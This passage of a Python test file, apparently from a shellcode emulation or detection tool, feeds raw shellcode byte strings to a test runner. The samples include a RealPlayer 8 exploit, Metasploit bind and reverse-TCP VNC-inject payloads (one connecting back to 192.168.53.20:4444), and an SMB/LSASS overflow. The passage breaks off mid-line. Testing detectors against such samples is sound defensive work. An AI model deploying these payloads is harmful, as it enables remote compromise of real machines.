b"\x52\x49\x43\x41\x52\x45\x55\x4E\x49\x54\x45\x44\x57\x41\x52\x52" 776 | shellcode += b"\x41\x4E\x54\x59\x53\x4C\x41\x50\x53\x54\x49\x43\x4B\x43\x52\x59" 777 | shellcode += b"\x50\x54\x4F\x47\x52\x41\x50\x48\x49\x43\x41\x4C\x4C\x59\x41\x44" 778 | shellcode += b"\x56\x49\x43\x45\x45\x4E\x4A\x4F\x49\x4E\x53\x47\x4C\x4F\x52\x49" 779 | shellcode += b"\x46\x49\x43\x41\x54\x49\x4F\x4E\x50\x48\x4F\x45\x4E\x49\x58\x41" 780 | shellcode += b"\x48\x4D\x45\x44\x41\x42\x41\x44\x50\x52\x4F\xEB\x2E\x58\x31\xDB" 781 | shellcode += b"\xB3\x64\x8B\x08\xC1\xC1\x07\x81\xF1\x64\x9A\xAA\x3B\x81\xC1\xC4" 782 | shellcode += b"\x73\xD8\x66\xC1\xC1\x0A\x81\xC1\x31\x85\xF2\x3B\x89\x08\x40\x40" 783 | shellcode += b"\x40\x40\x80\xEB\x02\x4B\x4B\x74\x07\xEB\xD7\xE8\xCD\xFF\xFF\xFF" 784 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 785 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 786 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 787 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 788 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 789 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 790 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 791 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 792 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 793 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 794 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 795 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 796 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 797 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 798 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 799 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 800 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 801 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 802 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 803 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 804 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 805 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 806 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 807 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 808 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 809 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 810 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 811 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 812 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 813 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 814 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 815 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 816 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 817 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 818 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 819 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 820 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 821 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 822 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 823 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 824 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 825 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 826 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 827 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 828 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 829 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 830 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 831 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 832 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 833 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 834 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 835 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 836 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 837 | shellcode += b"\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4\x53\xAC\x96\xB4" 838 | shellcode += b"\x53\x2C\x6E\xB5\x43\x42\x41\x43\x43\x43\x42\x41\x41\x42\x43\x41" 839 | shellcode += b"\x41\x0A\x43\x43\x41\x41\x41\x43\x43\x42\x42\x43\x43\x41\x42\x41" 840 | shellcode += b"\x43\x42\x43\x0A\x42\x43\x41\x41\x43\x41\x42\x43\x43\x41\x43\x43" 841 | shellcode += b"\x42\x43\x41\x0A\x43\x41\x43\x43" 842 | 843 | self.runShellcode(shellcode, 18) 844 | 845 | def testShellcode19(self): 846 | """ 847 | The Hackers Choice Realplayer 8 exploi 848 | """ 849 | 850 | shellcode = b"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" # 0x0000 ../../.. /../../." 851 | shellcode += b"\x2e\x2f\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" # 0x0010 ./+..... ..t$.[.s" 852 | shellcode += b"\x13\x9a\xaa\xe4\x36\x83\xeb\xfc\xe2\xf4\x66\xc0\x0f\x7b\x72\x53" # 0x0020 ....6... ..f..{rS" 853 | shellcode += b"\x1b\xc9\x65\xca\x6f\x5a\xbe\x8e\x6f\x73\xa6\x21\x98\x33\xe2\xab" # 0x0030 ..e.oZ.. os.!.3.." 854 | shellcode += b"\x0b\xbd\xd5\xb2\x6f\x69\xba\xab\x0f\x7f\x11\x9e\x6f\x37\x74\x9b" # 0x0040 ....oi.. ....o7t." 855 | shellcode += b"\x24\xaf\x36\x2e\x24\x42\x9d\x6b\x2e\x3b\x9b\x68\x0f\xc2\xa1\xfe" # 0x0050 $.6.$B.k .;.h...." 856 | shellcode += b"\xc0\x1e\xef\x4f\x6f\x69\xbe\xab\x0f\x50\x11\xa6\xaf\xbd\xc5\xb6" # 0x0060 ...Ooi.. .P......" 857 | shellcode += b"\xe5\xdd\x99\x86\x6f\xbf\xf6\x8e\xf8\x57\x59\x9b\x3f\x52\x11\xe9" # 0x0070 ....o... .WY.?R.." 858 | shellcode += b"\xd4\xbd\xda\xa6\x6f\x46\x86\x07\x6f\x76\x92\xf4\x8c\xb8\xd4\xa4" # 0x0080 ....oF.. ov......" 859 | shellcode += b"\x08\x66\x65\x7c\x82\x65\xfc\xc2\xd7\x04\xf2\xdd\x97\x04\xc5\xfe" # 0x0090 .fe|.e.. ........" 860 | shellcode += b"\x1b\xe6\xf2\x61\x09\xca\xa1\xfa\x1b\xe0\xc5\x23\x01\x50\x1b\x47" # 0x00a0 ...a.... ...#.P.G" 861 | shellcode += b"\xec\x34\xcf\xc0\xe6\xc9\x4a\xc2\x3d\x3f\x6f\x07\xb3\xc9\x4c\xf9" # 0x00b0 .4....J. =?o...L." 862 | shellcode += b"\xb7\x65\xc9\xf9\xa7\x65\xd9\xf9\x1b\xe6\xfc\xc2\xfc\x98\xfc\xf9" # 0x00c0 .e...e.. ........" 863 | shellcode += b"\x6d\xd7\x0f\xc2\x40\x2c\xea\x6d\xb3\xc9\x4c\xc0\xf4\x67\xcf\x55" # 0x00d0 m...@,.m ..L..g.U" 864 | shellcode += b"\x34\x5e\x3e\x07\xca\xdf\xcd\x55\x32\x65\xcf\x55\x34\x5e\x7f\xe3" # 0x00e0 4^>....U 2e.U4^.." 865 | shellcode += b"\x62\x7f\xcd\x55\x32\x66\xce\xfe\xb1\xc9\x4a\x39\x8c\xd1\xe3\x6c" # 0x00f0 b..U2f.. ..J9...l" 866 | shellcode += b"\x9d\x61\x65\x7c\xb1\xc9\x4a\xcc\x8e\x52\xfc\xc2\x87\x5b\x13\x4f" # 0x0100 .ae|..J. .R...[.O" 867 | shellcode += b"\x8e\x66\xc3\x83\x28\xbf\x7d\xc0\xa0\xbf\x78\x9b\x24\xc5\x30\x54" # 0x0110 .f..(.}. ..x.$.0T" 868 | shellcode += b"\xa6\x1b\x64\xe8\xc8\xa5\x17\xd0\xdc\x9d\x31\x01\x8c\x44\x64\x19" # 0x0120 ..d..... ..1..Dd." 869 | shellcode += b"\xf2\xc9\xef\xee\x1b\xe0\xc1\xfd\xb6\x67\xcb\xfb\x8e\x37\xcb\xfb" # 0x0130 ........ .g...7.." 870 | shellcode += b"\xb1\x67\x65\x7a\x8c\x9b\x43\xaf\x2a\x65\x65\x7c\x8e\xc9\x65\x9d" # 0x0140 .gez..C. *ee|..e." 871 | shellcode += b"\x1b\xe6\x11\xfd\x18\xb5\x5e\xce\x1b\xe0\xc8\x55\x34\x5e\x75\x64" # 0x0150 ......^. ...U4^ud" 872 | shellcode += b"\x04\x56\xc9\x55\x32\xc9\x4a\xaa\xe4\x36\x2e\x73\x6d\x69\x20\x52" # 0x0160 .V.U2.J. .6.smi R" 873 | shellcode += b"\x54\x53\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x44\x45\x53\x43\x52" # 0x0170 TSP/1.0. ...DESCR" 874 | shellcode += b"\x49\x42\x45\x20\x72\x74\x73\x70\x3a\x2f\x2f\x32\x31\x37\x2e\x31" # 0x0180 IBE rtsp ://217.1" 875 | shellcode += b"\x36\x30\x2e\x32\x32\x33\x2e\x37\x34\x3a\x35\x35\x34\x2f\x61\x73" # 0x0190 60.223.7 4:554/as" 876 | shellcode += b"\x64\x66\x2e\x6d\x70\x33\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d" # 0x01a0 df.mp3 R TSP/1.0." 877 | shellcode += b"\x0a\x44\x45\x53\x43\x52\x49\x42\x45\x20\x2f\x26\x21\x40\x2e\x25" # 0x01b0 .DESCRIB E /&!@.%" 878 | shellcode += b"\x5e\x25\x2e\x73\x6d\x69\x20\x52\x54\x53\x50\x2f\x31\x2e\x33\x2e" # 0x01c0 ^%.smi R TSP/1.3." 879 | shellcode += b"\x33\x2e\x37\x0d\x0a\x0d\x0a\x44\x45\x53\x43\x52\x49\x42\x45\x20" # 0x01d0 3.7....D ESCRIBE " 880 | shellcode += b"\x2f\x20\x2e\x73\x6d\x69\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d" # 0x01e0 / .smi R TSP/1.0." 881 | shellcode += b"\x0a\x0d\x0a\x20\x52\x54\x53\x50\x2f\x31\x2e\x30\x0d\x0a\x54\x72" # 0x01f0 ... RTSP /1.0..Tr" 882 | shellcode += b"\x61\x6e\x73\x70\x6f\x72\x74\x3a\x20\x54\x48\x43\x72\x30\x78\x21" # 0x0200 ansport: THCr0x!" 883 | 884 | self.runShellcode(shellcode, 19) 885 | 886 | def testShellcode20(self): 887 | """ 888 | win32_bind_vncinject - VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh 889 | AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=287 Encoder=None http://metasploit.com 890 | """ 891 | 892 | shellcode = b"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c" 893 | shellcode += b"\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32" 894 | shellcode += b"\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07" 895 | shellcode += b"\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24" 896 | shellcode += b"\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8" 897 | shellcode += b"\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64" 898 | shellcode += b"\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e" 899 | shellcode += b"\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53" 900 | shellcode += b"\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4" 901 | shellcode += b"\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9" 902 | shellcode += b"\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d" 903 | shellcode += b"\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51" 904 | shellcode += b"\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54" 905 | shellcode += b"\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff" 906 | shellcode += b"\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0\x6a" 907 | shellcode += b"\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55" 908 | shellcode += b"\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10" 909 | shellcode += b"\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3" 910 | 911 | self.runShellcode(shellcode, 20) 912 | 913 | def testShellcode21(self): 914 | """ 915 | windows/vncinject/reverse_tcp - 177 bytes (stage 1) http://www.metasploit.com DisableCourtesyShell=false, 916 | VNCHOST=127.0.0.1, VNCPORT=5900, EXITFUNC=seh, DLL=/tmp/framework-3.0/data/vncdll.dll, 917 | LPORT=4444, LHOST=192.168.53.20, AUTOVNC=true 918 | """ 919 | 920 | shellcode = b"\xfc\x6a\xeb\x47\xe8\xf9\xff\xff\xff\x60\x31\xdb\x8b\x7d" 921 | shellcode += b"\x3c\x8b\x7c\x3d\x78\x01\xef\x8b\x57\x20\x01\xea\x8b\x34" 922 | shellcode += b"\x9a\x01\xee\x31\xc0\x99\xac\xc1\xca\x0d\x01\xc2\x84\xc0" 923 | shellcode += b"\x75\xf6\x43\x66\x39\xca\x75\xe3\x4b\x8b\x4f\x24\x01\xe9" 924 | shellcode += b"\x66\x8b\x1c\x59\x8b\x4f\x1c\x01\xe9\x03\x2c\x99\x89\x6c" 925 | shellcode += b"\x24\x1c\x61\xff\xe0\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c" 926 | shellcode += b"\x8b\x70\x1c\xad\x8b\x68\x08\x5e\x66\x53\x66\x68\x33\x32" 927 | shellcode += b"\x68\x77\x73\x32\x5f\x54\x66\xb9\x72\x60\xff\xd6\x95\x53" 928 | shellcode += b"\x53\x53\x53\x43\x53\x43\x53\x89\xe7\x66\x81\xef\x08\x02" 929 | shellcode += b"\x57\x53\x66\xb9\xe7\xdf\xff\xd6\x66\xb9\xa8\x6f\xff\xd6" 930 | shellcode += b"\x97\x68\xc0\xa8\x35\x14\x66\x68\x11\x5c\x66\x53\x89\xe3" 931 | shellcode += b"\x6a\x10\x53\x57\x66\xb9\x57\x05\xff\xd6\x50\xb4\x0c\x50" 932 | shellcode += b"\x53\x57\x53\x66\xb9\xc0\x38\xff\xe6" 933 | 934 | self.runShellcode(shellcode, 21) 935 | 936 | def testShellcode22(self): 937 | """ 938 | Till sein lsass dump 939 | """ 940 | 941 | shellcode = b"\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8" 942 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x37\x13" 943 | shellcode += b"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f" 944 | shellcode += b"\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02" 945 | shellcode += b"\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f" 946 | shellcode += b"\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70" 947 | shellcode += b"\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30" 948 | shellcode += b"\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54" 949 | shellcode += b"\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00\x00\x00\x10\xbf\xff\x53\x4d" 950 | shellcode += b"\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00" 951 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x37\x13\x00\x00\x00\x00\x0c\xff\x00" 952 | shellcode += b"\x00\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x7e\x10\x00\x00" 953 | shellcode += b"\x00\x00\xd4\x00\x00\x80\x7e\x10\x60\x82\x10\x7a\x06\x06\x2b\x06" 954 | shellcode += b"\x01\x05\x05\x02\xa0\x82\x10\x6e\x30\x82\x10\x6a\xa1\x82\x10\x66" 955 | shellcode += b"\x23\x82\x10\x62\x03\x82\x04\x01\x00\x41\x41\x41\x41\x41\x41\x41" 956 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 957 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 958 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 959 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 960 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 961 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 962 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 963 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 964 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 965 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 966 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 967 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 968 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 969 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 970 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 971 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 972 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 973 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 974 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 975 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 976 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 977 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 978 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 979 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 980 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 981 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 982 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 983 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 984 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 985 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 986 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 987 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 988 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 989 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 990 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 991 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 992 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 993 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 994 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 995 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 996 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 997 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 998 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 999 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1000 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1001 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1002 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1003 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1004 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1005 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1006 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1007 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1008 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1009 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1010 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1011 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1012 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1013 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1014 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1015 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1016 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1017 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1018 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" 1019 | shellcode += b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x03\x00\x23\x82\x0c\x57\x03" 1020 | shellcode += b"\x82\x04\x0a\x00\x90\x42\x90\x42\x90\x42\x90\x42\x81\xc4\x54\xf2" 1021 | shellcode += b"\xff\xff\xfc\xe8\x46\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01" 1022 | shellcode += b"\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3\x2e\x49\x8b\x34\x8b\x01" 1023 | shellcode += b"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4" 1024 | shellcode += 